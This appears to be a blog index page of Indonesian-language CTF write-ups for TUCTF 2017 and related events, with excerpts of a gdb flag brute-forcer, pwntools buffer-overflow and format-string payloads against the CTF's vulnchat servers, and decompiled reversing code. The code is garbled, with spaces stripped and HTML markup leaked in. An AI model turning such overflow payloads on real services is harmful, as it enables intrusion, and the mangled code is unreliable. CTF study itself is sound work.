TPCTF 2017 - Write up

Read more →

TUCTF 2017 - Write up

gdb.execute("b 0x0000000000401c82")whileTrue:forcinchar_set:pattern=flag+c+"A"(55-len(flag))gdb.execute("r {}“.format(pattern))foriinrange(len(flag)):gdb.execute("c")rax=gdb.execute("p/x $rax",True,True).split()[-1]ifrax=="0x0":flag+=cif”}“inflag:print("Flag : %s"%(flag))exit(0)print("Curret Flag : %s"%(flag))sleep(1)breakprint("Pattern : %s"%(pattern))print("Nilai Rax : %s"%(rax))vuln=remote("vulnchat.tuCTF.com",4141)payload="A"20+p32(0x00007325)# overwrite with “%s"vuln.sendlineafter("Enter your username: “,payload)payload2="A"49+p32(0x804856b)vuln.sendlineafter(”: “,payload2)printvuln.recvall()flag="\x72"vuln2=remote("vulnchat2.tuCTF.com",4242)vuln2.sendlineafter("Enter your username: “,"AAAA")vuln2.recvuntil("AAAA: “)payload="A"*43+flagvuln2.send(payload)printvuln2.recv(1024)never=remote("neverending.tuCTF.com",12345)char_set="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 !"#$%&'()*+,-./:;<=>?@[]^_`{|}~</span>s"defround1(char="A"):never.sendlineafter("text:“,char)enc_base=never.recvline().split("is “)[1]enc_msg=never.recvline().split("is “)[1]enc_msg=enc_msg.split(” decrypted?\n")[0]log.info("ENC BASE : -> {}“.format(enc_base))log.info("ENC MSG : -> {}“.format(enc_msg))cal=ord(char)-ord(enc_base[0])dec="“.join([chr(ord(b)+cal)forbinenc_msg])<span class="n">non_printable</span> <span class="o">=</span> <span class="p">[</span> <span class="nb">chr</span><span class="p">(</span><span class="nb">ord</span><span class="p">(</span><span class="n">z</span><span class="p">))</span> <span class="k">for</span> <span class="n">z</span> <span class="ow">in</span> <span class="n">dec</span> <span class="k">if</span> <span class="n">z</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">char_set</span><span class="p">]</span> <span class="n">printable</span> <span class="o">=</span> <span class="s">""</span><span class="o">.
Read more →

TUCTF 2017 - Writeup

Reversing 200 (Unknown) Diberikan file ELF 64 bit stripped. Berikut hasil disassembly fungsi main signed __int64 __fastcall main(int a1, char **a2, char **a3) { signed __int64 result; // rax@2 unsigned int i; // [sp+14h] [bp-Ch]@5 char *v5; // [sp+18h] [bp-8h]@5 if ( a1 == 2 ) { if ( strlen(a2[1]) == 56 ) { v5 = a2[1]; for ( i = 0; i < 0x38; ++i ) { if ( (unsigned int)sub_401E90((__int64)v5, i) ) dword_603084 = 1; } if ( dword_603084 ) puts("Nope.
Read more →

Write Up Cyber Jawara 2017

Read more →